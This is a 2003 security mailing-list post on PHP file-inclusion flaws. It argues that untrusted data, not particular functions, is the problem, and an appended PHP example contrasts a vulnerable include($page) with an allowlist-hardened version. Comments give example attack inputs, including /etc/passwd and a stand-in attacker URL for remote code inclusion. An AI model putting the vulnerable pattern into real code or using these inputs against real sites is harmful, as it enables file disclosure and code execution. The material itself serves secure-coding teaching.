WebApp Sec mailing list archives

RE: Ten Security Checks for PHP, Part 1


From: "Michael Howard" <mikehow () microsoft com>
Date: Fri, 21 Mar 2003 16:42:17 -0800

Aaarrrgggg...

// $page is a variable from the URL
include($page); 
The user could set the $lib_dir or $page variables and include files
such as /etc/passwd or remote files such as
http://www.some-site.com/whatever.php with malicious code. This
malicious code could potentially delete files, corrupt databases, or
change the values of variables used to track authentication status.

What to Look For
Search code for the following functions: 

readfile 
fopen 
file 
include 
require  


This is just wrong. The security issue is NOT THESE FUNCTIONS - it's the
data, the fact that $page is untrusted is the issue....

Check the data.... If the data is untrusted, then validate it is
correctly formatted, correct and safe, and then call the functions you
need to get the job done...

Cheers, Michael
Secure Windows Initiative
Writing Secure Code 2nd Edition
http://www.microsoft.com/mspress/books/5957.asp


-----Original Message-----
From: Bob Auger [mailto:bauger () spidynamics com] 
Sent: Friday, March 21, 2003 1:39 PM
To: webappsec () securityfocus com

I found this linked from net-security.org today. Probably of interest to
the list.

http://www.onlamp.com/pub/a/php/2003/03/20/php_security.html

- Robert A.
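To make the point in the reply above concrete, here is an added example in PHP; it is not code from the onlamp.com article or from either poster. It shows the include($page) pattern the article flags next to a version that treats the URL value only as untrusted data, validated for format and meaning before any file is touched. The page names, the pages/ directory and the allowlist are assumptions made up for the illustration.

```php
<?php
// Added example, not from the original article or the mailing-list post.
// Page names, the pages/ directory and the allowlist are illustrative assumptions.

// Vulnerable: $page comes straight from the URL and reaches include() unchecked.
// ?page=/etc/passwd includes a local file; with allow_url_include=On,
// ?page=http://attacker.example/evil.php would run remote code.
function render_page_vulnerable(string $page): void
{
    include($page);
}

// Hardened: the URL value is only a lookup key. The path never comes from the user.
const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

// Returns the absolute path to include, or null if $page is not acceptable.
function resolve_page(string $page): ?string
{
    // 1. Validate format: short, lowercase letters only. Rejects '/', '.', ':' etc.
    if (!preg_match('/^[a-z]{1,32}$/', $page)) {
        return null;
    }
    // 2. Validate meaning: the key must be one we deliberately expose.
    if (!array_key_exists($page, PAGES)) {
        return null;
    }
    // 3. Defense in depth: the resolved file must really live under pages/.
    $root = realpath(__DIR__ . '/pages');
    $path = realpath(__DIR__ . '/' . PAGES[$page]);
    if ($root === false || $path === false) {
        return null;
    }
    if (strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $path;
}

function render_page(string $page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;  // same function as before; the data reaching it is now trusted
}

render_page($_GET['page'] ?? 'home');
```

The include() call is unchanged between the two versions; what changes is that every byte of $_GET['page'] is checked against an explicit allowlist before it influences a file path, which is the "check the data" step the reply asks for. The realpath() comparison is belt-and-braces: with a fixed map it should never fail, but it catches a later edit that puts a user-controlled fragment into the map.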
